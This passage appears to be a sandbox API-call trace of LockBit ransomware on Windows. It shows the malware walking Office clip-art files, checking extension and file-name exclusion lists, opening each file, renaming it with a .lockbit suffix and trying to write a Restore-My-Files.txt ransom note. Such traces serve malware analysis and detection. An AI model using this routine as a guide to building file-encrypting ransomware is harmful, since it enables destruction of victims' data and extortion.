(lpString1="thumbs.db", lpString2="DD01169_.WMF") returned 1 [0112.523] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01169_.WMF") returned 1 [0112.523] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.524] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned=".WMF" [0112.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.524] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.524] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.525] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.525] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.lockbit") returned 72 [0112.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.578] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.578] malloc (_Size=0x40068) returned 0x1ff1e60 [0112.579] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2020) returned 1 [0112.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0112.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0112.580] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.584] malloc (_Size=0xa6) returned 0x77d7a8 [0112.584] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.585] free (_Block=0x77d7a8) [0112.585] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.585] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.585] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x964, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01170_.WMF", cAlternateFileName="")) returned 1 [0112.585] lstrcmpiW (lpString1=".", lpString2="DD01170_.WMF") returned -1 [0112.586] lstrcmpiW (lpString1="..", lpString2="DD01170_.WMF") returned -1 [0112.586] PathFindExtensionW (pszPath="DD01170_.WMF") returned=".WMF" [0112.586] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.586] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.587] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.587] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01170_.WMF") returned 1 [0112.587] lstrcmpiW (lpString1="ntldr", lpString2="DD01170_.WMF") returned 1 [0112.587] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01170_.WMF") returned 1 [0112.587] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01170_.WMF") returned -1 [0112.588] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01170_.WMF") returned -1 [0112.588] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01170_.WMF") returned 1 [0112.588] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01170_.WMF") returned 1 [0112.588] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.588] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned=".WMF" [0112.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.588] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.588] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.589] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.589] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.lockbit") returned 72 [0112.589] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0112.589] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.589] malloc (_Size=0x40068) returned 0x3e70008 [0112.590] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2404) returned 1 [0112.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.591] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.595] malloc (_Size=0xa6) returned 0x77d7a8 [0112.595] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.596] free (_Block=0x77d7a8) [0112.596] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.596] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.596] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01171_.WMF", cAlternateFileName="")) returned 1 [0112.596] lstrcmpiW (lpString1=".", lpString2="DD01171_.WMF") returned -1 [0112.596] lstrcmpiW (lpString1="..", lpString2="DD01171_.WMF") returned -1 [0112.596] PathFindExtensionW (pszPath="DD01171_.WMF") returned=".WMF" [0112.596] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.597] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.598] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01171_.WMF") returned 1 [0112.598] lstrcmpiW (lpString1="ntldr", lpString2="DD01171_.WMF") returned 1 [0112.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01171_.WMF") returned 1 [0112.599] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01171_.WMF") returned -1 [0112.599] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01171_.WMF") returned -1 [0112.599] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01171_.WMF") returned 1 [0112.599] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01171_.WMF") returned 1 [0112.599] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.599] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned=".WMF" [0112.599] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.599] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.599] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.600] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.600] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.lockbit") returned 72 [0112.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0112.601] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.601] malloc (_Size=0x40068) returned 0x3ef0008 [0112.601] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2052) returned 1 [0112.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0112.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0112.602] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.605] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.605] malloc (_Size=0xa6) returned 0x77d7a8 [0112.605] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.606] free (_Block=0x77d7a8) [0112.606] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.606] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.606] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.606] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01172_.WMF", cAlternateFileName="")) returned 1 [0112.606] lstrcmpiW (lpString1=".", lpString2="DD01172_.WMF") returned -1 [0112.606] lstrcmpiW 